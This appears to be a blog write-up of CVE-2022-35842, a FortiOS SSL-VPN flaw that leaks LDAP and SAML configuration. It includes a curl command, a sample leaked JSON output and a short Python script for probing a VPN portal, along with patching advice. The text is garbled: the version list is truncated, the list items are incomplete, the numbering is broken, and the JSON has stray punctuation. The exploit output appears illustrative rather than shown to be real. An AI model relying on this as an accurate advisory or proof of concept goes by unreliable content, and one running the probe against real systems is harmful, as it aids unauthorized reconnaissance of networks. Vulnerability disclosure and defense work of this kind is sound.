Fortinet has a long history of providing reliable security for networks, but just like all tech, sometimes cracks can appear. One such issue is CVE-2022-35842, an “Exposure of Sensitive Information to an Unauthorized Actor” vulnerability (CWE-200) that impacts certain versions of FortiOS SSL-VPN.

In this post, we’ll look at what CVE-2022-35842 is, why it matters, how to spot if you’re at risk, what a possible exploit looks like, and how to prevent it.

What is CVE-2022-35842?

This vulnerability makes it possible for an unauthenticated attacker (someone without a login) to obtain sensitive settings—including LDAP and SAML configuration details—from a vulnerable FortiOS system that has SSL-VPN enabled.

FortiOS 6.4. through 6.4.9

All run the risk of leaking this data if not patched.

Why Does This Matter?

LDAP and SAML are used to manage how users authenticate to the VPN. Exposure of their configurations can help attackers:

Launch targeted phishing, replay, or relay attacks by understanding your login flow.

Essentially, it gives the bad guys a map of your castle's weak points.

How Does the Vulnerability Work?

The root problem is that certain unauthenticated HTTP(S) requests to vulnerable FortiOS devices would return detailed configuration info intended only for admins. The issue specifically affects the SSL-VPN web portal, which, due to improper authorization checks, can reveal config data to any outsider who knows where to look.

- Fortinet Security Advisory - FG-IR-22-174
- NIST NVD page - CVE-2022-35842
- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

Exploit Details: How an Attacker Might Do It

Below is a simplified example of what an actual information-leak attempt could look like.

Note: This is for educational use only! Always get permission before testing any networks.

Send a direct request to the SSL-VPN portal:

curl -k https://vpn.example.com/remote/login

Look for configuration details, like:

{
  "auth_type": "ldap",
  "sso_enabled": true,
  "ldap_server": "ldap://ad.example.local",
  "saml_idp_url": "https://idp.example.com/saml";,
  "saml_entity_id": "urn:example:sso"
}

4. Attackers can now use these to craft phishing or brute-force attacks, or even attempt to spoof identity providers.

Here’s a very simple Python script that returns the endpoint’s output

import requests

target = "https://vpn.example.com/remote/login"
try:
    r = requests.get(target, verify=False, timeout=3)
    print(r.text)
except Exception as e:
    print(f"Request failed: {e}")

Note: Replace vpn.example.com with the actual target.

Fortinet quickly released patches after the disclosure. The best way to stay safe

1. Update FortiOS: Upgrade to the latest version outside of vulnerable ranges (see the Fortinet Advisory).

Disable SSL-VPN if not in use: If you don't use SSL-VPN, turn it off.

3. Monitor for suspicious logins: Keep an eye on access logs for strange login attempts, especially after the date this was publicized.

Summary

CVE-2022-35842 proves that sometimes simple mistakes in web portal authentication can have big consequences. Attackers don’t need advanced tools—they just need to know where to look!

If your FortiOS device is running an affected version, patch immediately. Information exposure might seem low-priority, but in the hands of attackers, it can be the key to your network’s front door.

More Reading

- FortiGuard CVE-2022-35842 Landing Page
- NVD: CVE-2022-35842
- Basic Information Disclosure (CWE-200)

Timeline

Published on: 11/02/2022 12:15:00 UTC
Last modified on: 08/08/2023 14:21:00 UTC